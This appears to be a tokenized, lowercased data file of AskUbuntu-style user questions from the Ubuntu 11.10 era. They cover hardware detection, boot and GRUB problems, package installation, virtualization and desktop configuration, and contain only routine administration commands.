115807	new ubuntu install , only see 's 1 core of my dual core cpu	brand new install of 11.10 64-bit ubuntu . while getting my conky script up and running i kept seeing the error conky : attempting to use more cpus than you have ! and that was weird because ive never seen that before with other distros on the same box which is definitely a dual-core cpu . doing some investigating it seems that ubuntu is only recognizing 1 core on the cpu . i do have acpi enabled in my bios . im not sure if it matters but this is a guest vm installed in virtualbox on a windows7 64-bit host . here is the output of : lshw -class cpu *-cpu product : amd athlon ( tm ) 7850 dual-core processor vendor : hynix semiconductor ( hyundai electronics ) physical id : 2 bus info : cpu @ 0 width : 64 bits capabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx fxsr_opt rdtscp x86-64 3dnowext 3dnow up rep_good nopl extd_apicid pni monitor lahf_lm cr8_legacy output of cat /proc/cpuinfo processor : 0 vendor_id : authenticamd cpu family : 16 model : 2 model name : amd athlon ( tm ) 7850 dual-core processor stepping : 3 cpu mhz : 2687.223 cache size : 512 kb fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx fxsr_opt rdtscp lm 3dnowext 3dnow up rep_good nopl extd_apicid pni monitor lahf_lm cr8_legacy bogomips : 5374.44 tlb size : 1024 4k pages clflush size : 64 cache_alignment : 64 address sizes : 48 bits physical , 48 bits virtual power management : full output of dmesg can be found here http : //pastebin.com/b03petvx any input would be appreciated .
115810	is there any program similar to guitar pro available ?	http : //www.guitar-pro.com/en/index.php the official site .
115817	wget like utility to download all images in mysite.com/img/ directory	my access to the mysite.com/img/ directory is blocked . however all the images in that directory are in the form n.jpg where n is the nth image . my access to mysite.com/img/n.jpg is not blocked is there anyway i save images 1-500 ( mysite.com/img/1.jpg to mysite.com/img/500.jpg ) ? i 'm using ubuntu 11.10
115819	sorry , could not find a pty	i was hoping someone could help me understand what happened with my ubuntu server . i had an issue with it acting odd , i wo n't go into detail but i restarted the server with this command : shutdown -r now when it came back up , i attempted to use screen and was given this error : no more ptys . sorry , could not find a pty . [ screen is terminating ] i found this website which told me this : http : //en.positon.org/post/ % 5bscreen % 5d-no-more-ptys-sorry-could-not-find-a-pty you have to change /dev/ptmx file permissions : # ls -l /dev/ptmx crw-r -- r -- 1 root root 5 , 2 nov 18 23:28 /dev/ptmx # chmod a+w /dev/ptmx # ls -l /dev/ptmx crw-rw-rw- 1 root root 5 , 2 nov 18 23:34 /dev/ptmx this did n't resolve my issue since i was already at : crw-rw-rw- 1 root root 5 , 2 nov 18 23:34 /dev/ptmx same problem . so i found this post : http : //superuser.com/questions/302235/no-more-ptys-when-trying-to-start-screen so , i did what the answer suggested , which was : # mount devpts /dev/pts -t devpts -o mode=620 and it worked fine . anyone know what happened , why , and what the devpts did to fix it ? i 'm completely lost on this one . thank you !
115823	trim on an encrypted ssd	wiki.ubuntuusers.de says if i want to use trim on an encrypted ssd , i need at least cryptsetup 1.4 and kernel 3.1 . do i need this , when creating the partitions and setting up encryption , or is upgrading afterwards enough ?
115826	compiling programs : : what to do with previous ?	i am trying to venture into the world of open source development and had a question : everytime i want to compile the latest version , i usually download the tar ball and compile it . however , then i end up with 2 versions of the same software . one through sudo apt and one through compiling . how do i handle this problem ? should i delete the sudo apt'ed one and keep the development version or let them both stay ? also , i know its a dumb question but how do i make sure that my codes are up-to-date ? do i have to download the nightly builds everyday ( or checkout ) and compile everyday ?
115828	which version of ubuntu is compatible with acer aspire 5732z ?	i have an acer aspire 5732z laptop , and 6 days ago i have installed ubuntu 11.10 on my laptop , but i found black screen in login . i have tried a lot of ways to solve this problem , but there is no way . so can you tell me which version is compatible with this acer aspire ( 5732z ) ? detail : intel-pentium-processor t4400 ( 2.2 ghz , 800 mhz fsb ) , intel-gma 4500m , 15.6 '' hd lcd , 2gb memory , 320 gb hdd , acer nplify ( tm ) 802.11b/g/n . thank you . .. and finally , i found that linux mint is best for my acer-aspire5732z . it is also compatible with ubuntu codes , because as i know it is base on ubuntu .
115829	problems with screen	on the screen appear black line and the screen sometimes freezes and flashes . when a right screenshot of the screen or record desktop turns on normally . this does not appear on windows 8 cp and ubuntu 2d and other themes for ubuntu . how can i fix this ?
115835	is it possible to skip an lts upgrade ?	if you want to upgrade from 10.10 to 12.04 , then you 'll need to follow the upgrade path ; 10.10 > 11.04 > 11.10 > 12.04 . however , with lts versions , you can upgrade directly , so that you can upgrade from 10.04lts to 12.04lts directly . but now , lts versions are supported for five years while there 's still a new lts every two years . that means you can choose to skip an lts . so the question is ; will i be able to upgrade from 12.04lts to 16.04lts directly , or will i then have to follow the lts upgrade path ; 12.04 > 14.04 > 16.04 ?
115836	`` guided - use entire disk and set up encrypted lvm '' luks or plain dm-crypt ?	does the alternate installer 's `` guided - use entire disk and set up encrypted lvm '' use luks or plain dm-crypt ?
115841	attempting to install ubuntu 11.10	i installed version 9 sometime ago and since have forgotten the process for partitioning , or the layout is different . i have 5 partitions but only have windows xp installed on the pc in question with that being the one of those 5 partitions which is ntfs 34444 mb its - a 40gig hard-drive . my first question is ... is there a way to get a screen shot of the partitioner when i am running the demo session straight from disc ... these 5 partitions are fragmenting the other 4ish gig needed to install.. i get an error message which says go back and make sure 1 partition has at least 2.5 gig or so . but i have no idea what i am supposed to set these remaining 4 partitions to in order to proceed.. i have read up on install guides and understand that one must be `` / '' root and another as swap ... but to no avail thus far have the correct combo . a few screen shots will no doubt help you guys answer as i 'm baffled as to what specific details to give as each one has various settings on inspection , and i do n't really feel like writing it all down manually then posting specs for each one edit : thanks for the reply , very helpful that is the screenshot from gpart http : //i1098.photobucket.com/albums/g369/ryan_onessence/screenshotat2012-03-25220041.png and this is from the installer http : //i1098.photobucket.com/albums/g369/ryan_onessence/screenshotat2012-03-25220539.png
115845	how can i change the folder icon ?	i know how to change an icon this way . also that does n't work for folders inside nautilus , but for application launchers . what i 'm looking for is an equivalent to changing the icon for an application in the launcher , i. e. the home folder , via gedit ~/.local/share/applications/nautilus-home.desktop that way you can set an icon type , which is helpful when you later want to change the icon set resp . theme or when you want the best resolution for each size of the icon . so , i know how i can do this for applications in the launcher - but how can i realize this for icon folders in nautilus ? ( in which file these settings are stored and editable with i. e . gedit ? ) for example , i try to change the folder icon for ~/.wine/drive_c . i want to use this faenza icon ( i use faenza-theme , the icon is called folder-wine.png ) : i want it to appear in best resolution : smaller as bookmark in nautilus ' sidebar , bigger as folder icon when i search unity 's dash . using the scalable svg is not a solution , because it looks slightly different from the equivalent png .
115847	i can not log in after theme change	after changing the gtk-theme in the gnome tweak tool , i was taken out of the session to the login screen and now i can not log in . i can only log in using the guest account . so in the grub menu i selected the recovery mode and in the resulting menu i selected root-drop to root shell prompt . once there i did a couple of things i 've found in several pages and in the forums . gsettings reset org.gnome.desktop.interface gtk-theme this is what i got : ** ( process:642 ) : warning** : command line 'dbus-launch âautolunch=4438d024dd45ef7fb2d3f4ab0000000f âbinary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed.\n and nothing changes . gconftool-2 -- type=string -s /desktop/gnome/interface/gtk_theme radiance with this i was trying to change the gtk theme to the radiance one . no strange message this time but it did not work either . i still can not log in . any ideas please ?
115849	installing ubuntu 10.04 to external hdd overwrites the mbr of the internal hdd	i have a asus a42f laptop which has windows 7 32 bit installed on it 's internal hdd . i have just installed ubuntu 10.04 on a portable hdd using the laptop . now my laptop does not boot windows 7 if the portable hdd is disconnected . i can only get the boot menu when the portable hdd is connected . the portable hdd does not boot when connected to another computer . please help me , i want to : boot windows from the internal drive , without grub boot ubuntu from the external drive via the bios boot menu ( f8 or f12 )
115851	kde 's dolphin ca n't see connected devices such as nikon , canon cameras	i have noticed this problem across all distros including kubuntu and opensuse . many times my nikon d 7000 and canon hf 11 are not seen or mounted by dolphin . when i connect the cameras i do n't get any notification in the tray which otherwise shows connected device . ironically when i open nautilus then i can clearly see the cameras mounted . i also have a request that what these devices do n't appear on dolphin 's side panel automatically . it makes life easier for a users . https : //bugs.launchpad.net/ubuntu/+source/dolphin/+bug/956806/+attachment/2879913/+files/dolphin.png
115854	can i run pinball fx2 ?	is it possible that without using play on linux application ( which takes a lot hard disk space ) installed pinball fx2 ( windows 8 version ) with the ability to connect to xbox live ?
115859	nautilus icons are not displayed	i 'm using ubuntu 11.10 and sometimes nautilus icons stop being displayed and it looks like this : is there a way to fix this without rebooting ?
115863	screen darkens after 40 seconds of inactivity	i am running linux ubuntu 10.04 on my dell laptop . there 's a setting that i would like to change , but i do n't know how . after about 40 seconds of inactivity , my screen gets darker . then when i click again on my mouse or keyboard , it comes back bright again . i would like to disable this setting .
115864	how to make samsung clx-3185 scanner-part work ?	i have the samsung clx-3185 printer/scanner . the printer-part works fine using 3175 drivers found by ( xubuntu/xfce ) printer setup wizard . however it does not seem to recognize the scanner part . xsane does not find the scanner . is there a setup howto for this anywhere that i could use ?
115867	power failure during ubuntu installation killed my drive	well , things eat really bad in the last hour . i have two ocz ssd . on one windows 7 is installed , on the second i tried to install ubuntu 11.10 . now my ssd is not recognizable ( also on the bios ) nd i ca n't login to windows ( but know how to fix that ... maybe.. ) ny ideas bout the drive ? thanks ! unlucky roy
115868	i can not install google chrome	for the command : apt-cache show google-chrome-stable i get : package : google-chrome-stable version : 7.0.517.44-r64615 architecture : i386 maintainer : chrome linux team < chrome-linux-packager @ google.com > installed-size : 76076 pre-depends : dpkg ( > = 1.14.0 ) depends : ca-certificates , libasound2 , libatk1.0-0 ( > = 1.13.2 ) , libbz2-1.0 , libc6 ( > = 2.6-1 ) , libcairo2 ( > = 1.4.0 ) , libfontconfig1 ( > = 2.4.0 ) , libfreetype6 ( > = 2.3.5 ) , libgcc1 ( > = 1:4.2.1 ) , libgconf2-4 , libglib2.0-0 ( > = 2.14.0 ) , libgtk2.0-0 ( > = 2.12.0 ) , libjpeg62 , libnspr4-0d ( > = 4.7.1 ) , libnss3-1d ( > = 3.12.3 ) , libpango1.0-0 ( > = 1.18.3 ) , libpng12-0 , libstdc++6 ( > = 4.2.1 ) , libxslt1.1 , libxss1 , lsb-base ( > = 3.2 ) , wget , xdg-utils ( > = 1.0.1 ) , zlib1g ( > = 1:1.2.3.3.dfsg-1 ) conflicts : google-chrome replaces : google-chrome provides : google-chrome priority : optional section : net filename : pool/main/g/google-chrome-stable/google-chrome-stable_7.0.517.44-r64615_i386.deb size : 21896322 sha1 : 2a09d457180a77a6d1472f24562feb43c2184cf5 md5sum : eff030c9ebee87eb3abff1ce95f65796 description : the web browser from google google chrome is a browser that combines a minimal design with sophisticated technology to make the web faster , safer , and easier . package : google-chrome-stable status : install ok unpacked priority : optional section : web installed-size : 108380 maintainer : chrome linux team < chromium-dev @ chromium.org > architecture : i386 version : 17.0.963.83-r127885 replaces : google-chrome provides : google-chrome , www-browser depends : libasound2 ( > > 1.0.22 ) , libbz2-1.0 , libc6 ( > = 2.11 ) , libcairo2 ( > = 1.6.0 ) , libcups2 ( > = 1.4.0 ) , libdbus-1-3 ( > = 1.2.14 ) , libexpat1 ( > = 1.95.8 ) , libfontconfig1 ( > = 2.8.0 ) , libfreetype6 ( > = 2.3.9 ) , libgcc1 ( > = 1:4.1.1 ) , libgconf2-4 ( > = 2.27.0 ) , libgcrypt11 ( > = 1.4.2 ) , libglib2.0-0 ( > = 2.18.0 ) , libgtk2.0-0 ( > = 2.18.0 ) , libnspr4-0d ( > = 4.7.3-0ubuntu1~ ) | libnspr4 ( > = 4.8.7-0ubuntu1 ) , libnss3-1d ( > = 3.12.3 ) , libpango1.0-0 ( > = 1.20.0 ) , libpng12-0 ( > = 1.2.13-4 ) , libstdc++6 ( > = 4.4.0 ) , libx11-6 ( > = 0 ) , libxext6 ( > = 0 ) , libxfixes3 ( > = 1:4.0.1 ) , libxrender1 , libxss1 , zlib1g ( > = 1:1.2.3.3.dfsg ) , ca-certificates , libcurl3 , libatk1.0-0 ( > = 1.30.0 ) , lsb-base ( > = 3.2 ) , xdg-utils ( > = 1.0.2 ) , wget pre-depends : dpkg ( > = 1.14.0 ) conflicts : google-chrome description : the web browser from google google chrome is a browser that combines a minimal design with sophisticated technology to make the web faster , safer , and easier .
115872	ubuntu 11.10 will not boot after succesfully installed on 8gb usb 3.0 pendrive	ubuntu 11.10 on 8gb usb 3.0 pendrive . drive partitioned using gparted . 4gb base 3gb home 600mb swap installation ok . restart blinking cursor . installed another distro on another usb 3.0 stick . it boots ok. -- -- -- -- -- -- -- - debug -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- boot other distro and check : i compare boot file with another linux . grub of ubuntu is 1.4mb contend is different . taken photo with mobile camera but can not add here . files has note ( music ) sign on it . downloaded 11.10 desktop and installed . same result . will download 12.x when ready and try . ready to try any suggestion .
115877	how to turn numlock on by default on startup on ubuntu 10.04 using lxde ?	what is the standard way to turn numlock on by default on startup on lubuntu 10.04 ? lubuntu installs lxde . i saw some aother solutions for other flavours , but maybe there is a special setting for the lubuntu flavour . i tried already numlock=0 and numlock=1 in /etc/lxdm/lxdm.conf , but numlock stays off on the next boot . all other operating systems , also other ubuntu systems , do have numlock turned on on the same machine after booting . i installed numlockx , and it can change the value , but is this the standard lubuntu way to go ? if so , what is the standard place in the lubuntu startup sequene to insert 'numlockx on ' , how do i set this up correctly ? i also looked at the included lxde keyboard configuration system gui tool , but there are only few options , numlock default not among them . ( please before you mark this as duplicate consider if it really fits , i could not find this answered in this way . i am interestd to know the standard way for lubuntu ( and not kubuntu or gnome ) in detail . ) there is also an explanation of the lxdm config file here , but it does not really explain what `` lxde numlock suport '' means ( how could a gui not support numlock ? ) and what the settings 0 and 1 mean : http : //manpages.ubuntu.com/manpages/lucid/man1/lxdm.1.html if there is no other lxde or lubuntu standard way to do it , i am planning to use numlockx and add this line : /usr/bin/numlockx on at the beginning of either /etc/x11/xinit/xinitrc or ~/.xinitrc following the instructions found here : http : //www.cyberciti.biz/faq/how-to-linux-turn-on-num-lock-on-gnome-startup/
115879	i ca n't hear anything in ubuntu 11.10 , except for `` front left '' and `` front right '' inside settings	i 'm building an htpc . it used to be a windows 7 with no issues , but , since i want to use mdadm for my disks , i 'm changing to ubuntu with xbmc . system specs : zotac h67itx core i3 2100t 8gb ram i went to system settings- > sounds- > hardware tab and changed the profile to digital stereo ( hdmi ) output . this is the only way i can hear something coming from the speakers on my tv . no other profile sounds anything . so this tells me the drivers for intel sound are working . however , i ca n't hear anything else from any other program , including ubuntu sounds . so , i believe there 's a misconfiguration somewhere ; ubuntu has another sound profile as default , so i that i ca n't hear anything from the os or xbmc . any ideas ?
115880	how do i get a spc 300nc working on a 64-bit system ?	it seems that this solution to webcam problems in ubuntu 11.10 does n't work in the 64 bit version . if i run the following command : '' ld_preload=/usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so skype '' all i get is : '' ld.so : object '/usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so ' from ld_preload can not be preloaded : ignored . '' and if i try : '' ld_preload=/usr/lib/x86_64-linux-gnu/libv4l/v4l2convert.so skype '' i ca n't get it to work in ubuntu 12.04 after all . i just installed the beta 2 , and installed skype from `` partners '' . no webcam with either of these tricks : ( tried the 64 bit version from skype.com but no luck there either .
115883	problems with updating	when i booted up my labtop it loaded into the black login screen . i put in all my details and then it said to type in some update code that was on the screen , so i did . it started downloading after a little bit and said it would take about 40 minutes , but i turned around and back and the screen went black . did something go wrong ? is it still downloading , do i have to reboot and do everything all over again ? i just wish to get her working again ! i 've only waited about 7 minutes so far , but i 'm just worried ! !
115884	package 'mercurial ' has no installation candidate , how do i fix it ?	e : package 'mercurial ' has no installation candidate . how can i solve this problem ? sudo apt-get install mercurial reading package lists ... done building dependency tree reading state information ... done package mercurial is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , oris only available from another source
115885	bug or kludge in /etc/init.d/networking	there are some strange code : if ifup -a -- exclude=lo ; then log_action_end_msg $ ? else log_action_end_msg $ ? fi both variants have exactly same code : log_action_end_msg $ ? why need `` if '' , `` then '' , `` else '' , `` fi '' ? why not simple : ifup -a -- exclude=lo log_action_end_msg $ ? there are 3 times such code in this file . this file belongs to `` netbase '' 4.35ubuntu3
115895	ubuntu one for android without google account ?	is there an opportunity to download and install the ubuntu one client for android without having a google account ?
115898	can no longer launch bibble ubuntu 11.10	when trying to launch bibble5 i get the following error message : ./bibble5 : error while loading shared libraries : libgl.so.1 : wrong elf class : elfclass64 is this a case of another fresh install ? i seem to be doing a weekly fresh install , this breaks and there never seems to be any way to fix it.. if anyone has any ideas , it would be appreciated . thanks ubuntu 11.10 64bit
115901	installing woes with toshiba qosmio x505-888	i been having trouble install on my qosmio x505-888 . every time i try to install i get passed the graphic boot screen , but it turns into a graphic maze and freezes on me . i 've seen people install ubuntu on qosmio , but i was wondering if i was doing something wrong or is there a setting that i can use to install it properly ?
115902	how to upgrade my version of gtk+2.0	this bug affects me , but it says that it has been fixed in gtk+2.0 - 2.24.8-0ubuntu1 . i have version 2.24.6-0ubuntu5 . is there some way for me to upgrade ? ( ubuntu 11.10 64bit unity )
115903	xfce / bash : gui elements in shell script	i have a minimal installation with xfce as the default window manager . is it somehow possible to write a shell script with simple gui elements ? or do i to install something else ( which i am reluctant to do , i want to keep the number of installed packages ( size ) to a minimum ) .
115904	ca n't boot xp after ubuntu installation , how to fix ?	i installed ubuntu and after the installation , i ca n't boot to xp . when i choose xp from the grub menu , i got black screen for like 30 sec , and then it returns to the grub menu . thanks !
115913	disable ubuntu update manager 's new version warning	how to disallow ubuntu to upgrade from like 11.10 to 12.04 ? i know that its your wish if you want to upgrade , but i do n't want the message in update manager that says a new release is available to get displayed . all help will be appreciated
115918	change the ubuntu boot splash screen ?	how to change the ubuntu boot splash screen ? i mean the one which comes up when you boot with the loading bar . i want to change both the one which comes up with text ( like when you run in vmware ) and the graphical one . i tried changing it in plymouth , the text only version , but only the shutdown screen got changed , the startup screen is still displaying ubuntu . any ideas ?
115920	is there a way not to store the password when logging into ubuntu one ?	i am trying u1 on android and i do n't want to store my password on the device . it would be nice ( for me ) to have the option to be asked for the password at login . this is also required for the others platform clients . is there a way to force a password on logon ?
115921	ubuntu software center ( 10.04lts ) missing packages	i recently downgraded from 11.10 to 10.04lts for compatibility and support of specific development tools . the ubuntu software center is missing many packages that i had access to in 11.10 , most notably libreoffice . ( also development tools . ) is there a way to update software sources to find the missing packages ? ( or are they incompatible with 10.04 ? ) synaptic does not have libre either . i feel like i am working with a gimped version of usc .
115926	command `` init 1 '' freezes computer	i 'm taking a beginners administration for linux class , and one of the things we are learning is how to change `` runlevel '' in order to optimize efficiency and security of a server . however , when i run the command `` init 1 '' or `` telinit 1 '' it brings my computer to the ubuntu loading screen , looks like it is loading something , and then freezes . i have tried this with the same results on both my dedicated desktop and on a separate computer through a virtual machine . am i doing something wrong ? i am a borderline n00b so i understand it is probable i am missing something obvious .
115930	how to run pam face authentication	i am using ubuntu 11.10 . i went to the following url to download the software pam face authentication and downloaded the version for natty narhwall . i installed the software using the following commands : sudo apt-get install build-essential cmake qt4-qmake libx11-dev libcv-dev libcvaux-dev libhighgui2.1 libhighgui-dev libqt4-dev libpam0g-dev checkinstall cd /tmp & & wget http : //pam-face-authentication.googlecode.com/files/pam-face-authentication-0.3.tar.gz sudo add-apt-repository ppa : antonio.chiurazzi sudo apt-get update sudo apt-get install pam-face-authentication cat < < eof | sudo tee /usr/share/pam-configs/face_authentication /dev/null **name : ** face_authentication profile **default : ** yes **priority : ** 900 **auth-type : ** primary **auth : ** [ success=end default=ignore ] pam_face_authentication.so enablex eof sudo pam-auth-update -- package face_authentication the software installed and i can run the qt-facetrainer . but the problem is when i restarted my system , i saw that the default login screen is appearing where i should put my password to login . the webcam is not starting at all . and i can not login with my face . which means i think that pam face authentication programme is not starting at all . please let me know how i can login with my face using pam face authentication programme .
115931	xen 4.1 missing from the grub menu	i installed xen with following commands . apt-get install xen-hypervisor-4.1-i386 apt-get install xen-utils-4.1 apt-get install xenwatch apt-get install xen-tools apt-get install xen-utils-common apt-get install xenstore-utils apt-get install virtinst apt-get install virt-viewer apt-get install virt-manager as given in http : //www.beyondlinux.com/2011/11/02/install-xen-4-1-and-setup-your-cloud-os-on-ubuntu-11-10/ but i cant see any entry for xen 4.1 in my grub menu upon reboot . ( as soon as i install above listed packages ) any solution ? please help
115939	ubuntu 11.10 adobe pdf 9 not associated correctly	i have had problems associated adobe pdf reader in ubuntu for a long time . any time i have needed to open a pdf for example in firefox or a downloaded pdf i have to manually open the file after opening adobe pdf reader . i recently un-installed adobe pdf reader today trying to fix this issue planning on re-installing it later and noticed that there is an app in the system menu called adobe pdf reader 9 still lingering when i did a search for adobe . when i tried to launch the app after un-installing it it gave me an error message failed to launch child process and is looking in my download directory . does anyone know how to remove this bogus link from my system menu , i think it may be causing the file association problems . thank you , mixphonics
115940	how can i setup ssh so that it is restricted to my local network ?	i 'm trying to link my new laptop running 11.10 to my old laptop running 8.04 through my router using ssh . this question is asked and answered on ubuntuforums here : http : //ubuntuforums.org/showthread.php ? t=1648965 i thought it would be helpful to have a more definitive answer here . note : i needed to first install openssh-server on the laptop i was trying to connect to and open up the ssh port in my firewall using firestarter .
115945	compatibility program ?	i am new to ubuntu and have 11.10 . really need to install a program i use all the time on a windows 7 desktop . is it possible to use a windows required program on ubuntu and if so what so i have to do to make that possible ?
115946	strange resolution on ubuntu 11.10	i only just installed ubuntu 11.10 , so excuse me if this question is silly ; - ) i have a fujitsu esprimo mobile v655 , nvidia 8200 graphics , and recently installed ubuntu 11.10 using wubi . i had to modify booting commands to include nomodeset ; otherwise ubuntu would not boot . now i did set my screen resolution to 1280 x 720 , which is the correct resolution for this screen . still , the display seems imperfect . the font sizes seem unnatural ( too large / stretched ) and text is quite blurry ( especially in firefox ) . could it have something to do withe the nvidia graphics driver and/or the nomodeset parameter ? how can i fix this ? update : i used jockey-gtk to update nvidia to the current version . this improved the resolution dramatically ( no blurriness , fonts are good ) . it also means that i no loger need to include nomodesetin the boot commands . however , other problems were brought up by this . it seems that certain files can not be accessed - icon ( images ) are missing , some task bars are completely unstyled ( grey , block-form , win97 style ) . i also get this error message ( roughly translated from german , so may be slightly different from actual ) every time i reboot : could not apply the stored configuration for the monitor : none of the chosen modi is compatible with the available modi . i have tried nvidia-xconfig , unity -- reset , no improvements . can anyone help , please ?
115951	destroy guest os using php	i am using libvirt-php to manage my virtual machines , and i need to shutdown/destroy domu . for this i used the following php script : < ? php $ conn=libvirt_connect ( `` xen : /// '' ) ; $ name=libvirt_domain_lookup_by_id ( $ conn,4 ) ; $ dest=libvirt_domain_destroy ( $ name ) ; echo $ dest ; ? > when i run this on xampp server i get the following output : warning : libvirt_domain_destroy ( ) [ function.libvirt-domain-destroy ] : operation virdomaindestroy forbidden for read only access in /opt/lampp/htdocs/xampp/byname.php on line 5 . here is the documentation : http : //libvirt.org/php/api-reference.html # libvirt_domain_destroy
115954	after updates i got a debian bootlogo ?	last night i had some update i think that that was the cause i did n't check what updates and now when i boot i got a debian bootlogo ? ? ? and i have a ubuntu 11.10 amd64 ? i also installed gnome-shell . everything works fine but still its strange my question is what is the cause , and is it a bug ( do i need to file a bug report ) and how to fixit
115955	compile linux source in /home	i went through many linux kernel compilation tutorials ... all of them suggest to put the kernel code in /usr/src . is it for any special reason ? what happen if i compile code in /home ? because my /usr have only 4gb is left . and he also created a soft link before compiling kernel . is it necessary ? what is purpose behind it ?
115956	why does 'top ' say my machine is only 50 % idle ?	what 's going on here ? i 'm running nothing on the system , iotop and iftop show the network and hard drive are both idle , and top ( sorted by % cpu ) shows nothing running . so why is the system only 50 % idle ? what 's the other 50 % waiting for ? how can i find out ? top - 12:01:05 up 3 days , 15:03 , 1 user , load average : 6.00 , 6.01 , 6.05 tasks : 179 total , 1 running , 178 sleeping , 0 stopped , 0 zombie cpu ( s ) : 0.7 % us , 0.0 % sy , 0.0 % ni , 49.7 % id , 49.7 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 2053996k total , 1992600k used , 61396k free , 81680k buffers swap : 4092924k total , 10740k used , 4082184k free , 1338636k cached pid user pr ni virt res shr s % cpu % mem time+ command 1042 deb 20 0 21468 1412 1000 r 1 0.1 0:00.03 top 1 root 20 0 24188 1952 1152 s 0 0.1 0:01.44 init 2 root 20 0 0 0 0 s 0 0.0 0:00.05 kthreadd update : dmesg shows the printer driver misbehaving : [ 28858.561847 ] cnijnetprn [ 1503 ] : segfault at 29 ip 00007f56cf3480f7 sp 00007fffb964ec30 error 4 in libcnnet.so.1.2.0 [ 7f56cf345000+9000 ] [ 68851.187802 ] cnijnetprn [ 9180 ] : segfault at 29 ip 00007ffe7636a0f7 sp 00007fff9a8b1990 error 4 in libcnnet.so.1.2.0 [ 7ffe76367000+9000 ] [ 155412.107826 ] cnijnetprn [ 19966 ] : segfault at 29 ip 00007fc31de770f7 sp 00007fffc03aa8e0 error 4 in libcnnet.so.1.2.0 [ 7fc31de74000+9000 ] and also some issue with cp : [ 248041.172067 ] info : task cp:27488 blocked for more than 120 seconds . [ 248041.172071 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . [ 248041.172075 ] cp d ffffffff81805120 0 27488 27345 0x00000004 [ 248041.172080 ] ffff880078d57a38 0000000000000046 ffff880078d579d8 ffffffff81032a79 [ 248041.172085 ] ffff880078d57fd8 ffff880078d57fd8 ffff880078d57fd8 0000000000012a40 [ 248041.172090 ] ffff88007b818000 ffff880069acc560 ffff880078d57a18 ffff88007f8532c0 [ 248041.172095 ] call trace : [ 248041.172104 ] [ < ffffffff81032a79 > ] ? default_spin_lock_flags+0x9/0x10 [ 248041.172109 ] [ < ffffffff8110a360 > ] ? __lock_page+0x70/0x70 [ 248041.172114 ] [ < ffffffff815f0ecf > ] schedule+0x3f/0x60 i did try copying something to the usb stick that 's plugged into the router and mounted onto this computer using mount.cifs . that almost always causes everything to lock up , so i 'm guessing that 's the problem . i 'll reboot and stop using mount.cifs .
115960	unity 11.10 and vga output to flat screen tv	when i connect a vga cable from my hp laptop to my sony 40 '' flat screen , i get a weird looking desktop : it tends to have everything on the right but no dash , icons etc . i enabled ccsm and checked different multiple desktop views there and found each desktop is doubled width-wise and only display the right hand desktop ( no icons and no awn dock - they are only on the left hand desktop ) . also , i can right click and choose change desktop background , then all settings to get to system settings . in displays , it shows the laptop and the tv is shown as 72 '' sony . i 've tried all the resolutions for the tv display but everything gives me what i 've described above . the resolution on the laptop in windows is 1024x768 60 htz -- this would be a great option in 11.10 but is not available . any ideas on how i can change the displays to show a 40 '' sony ? or at least create a resolution that will show each desktop , without the schism ?
115963	how do i migrate to utc hardware clock ?	i have been using local time hardware clock because of sharing the machine with a windows system . now i do n't use windows any actively and would like to set the hardware clock to utc . how to reconfigure this in ubuntu ? ps : i use xubuntu actually , so i 'd like a command-line-based desktop-agnostic solution .
115968	how to replace grub with windows nt bootloader ?	i 'm not really a big fan of grub ( i had a bad experience ) , nor very knowledgeable about linux , so how do i remove grub , and replace it with windows nt bootloader , yet keep the same list/number/entries of os , but swap bootloader ? i have installed ubuntu 12.04 alpha 2 after windows .
115970	libimobiledevice wants to remove all my other packages	when running the command sudo apt-get remove libimobiledevice2 i get : the following packages will be removed : ... gdm gdm-guest-session gnome-power-manager gnome-session gnome-session-bin gvfs-backends indicator-power indicator-session kde-plasma-desktop kde-standard libgpod-common libgpod4 libimobiledevice2 nautilus-share ubuntu-desktop upower` is it really nessecary to remove all of my kde and gnome packages ? the source of the problem is that the installed oneric package does n't recognize my ios 5.1 - so i wanted to switch to the latest and greatest ( 1.0.7 and if that 's not good enough i 'll go to the dev version 1.1.2 ) . i 'm using oneric 64bit .
115975	disable adding newly installed applications to the launcher ?	when i install new applications from ubuntu software center , they 're automatically added to the launcher on the left side of the screen . i understand that this makes it easier for new users to learn how the system works , but i would like to disable that and add it myself later if i want to . is there a way to do that ?
115977	java issues on openvz ubuntu 11.04 ( .jar/.sh files )	i 've had a whole line of messes with java and .jar files . i 've tried both openjdk ( from software installer ) and about three repositories for sun . /desktop # java -jar -xmx1024m ss.jar exception in thread `` main '' java.awt.headlessexception at java.awt.graphicsenvironment.checkheadless ( graphicsenvironment.java:173 ) at java.awt.window. < init > ( window.java:476 ) at java.awt.frame. < init > ( frame.java:419 ) at java.awt.frame. < init > ( frame.java:384 ) at javax.swing.jframe. < init > ( jframe.java:174 ) at org.powerbot.bd. < init > ( unknown source ) at org.powerbot.boot.main ( unknown source ) two separate errors : ~/desktop # ./ss.sh [ severe ] org.server.boot : default heap size of 490m too small , restarting with 768m and about 30 different crashes were it just `` aborts '' with a huge file dump . each time i 've tried something a little different , whether it be updating java or just changing -xmx1024 to -xmx1024m to get rid of the heap . personally i think it has something to do with openvz , but google has n't saved me this time , i need someone who can get to the bottom of my problem . java -version java version `` 1.6.0_26 '' java ( tm ) se runtime environment ( build 1.6.0_26-b03 ) java hotspot ( tm ) 64-bit server vm ( build 20.1-b02 , mixed mode ) is my current install . running ss.sh gives me : ( i 'd post the entire log but its long ) # # a fatal error has been detected by the java runtime environment : # # sigill ( 0x4 ) at pc=0x00002b14278e6fa0 , pid=9301 , tid=47365590714112 # # jre version : 6.0_26-b03 # java vm : java hotspot ( tm ) 64-bit server vm ( 20.1-b02 mixed mode linux-amd64 compressed oops ) # problematic frame : # c [ ld-linux-x86-64.so.2+0x14fa0 ] _dl_make_stack_executable+0x2b50 # # if you would like to submit a bug report , please visit : # http : //java.sun.com/webapps/bugreport/crash.jsp # the crash happened outside the java virtual machine in native code . # see problematic frame for where to report the bug . # i 'm willing to let someone who knows what they are talking about view it and try and sort this out . any help would be appreciated , i 've about pulled all my hair googling to no avail .
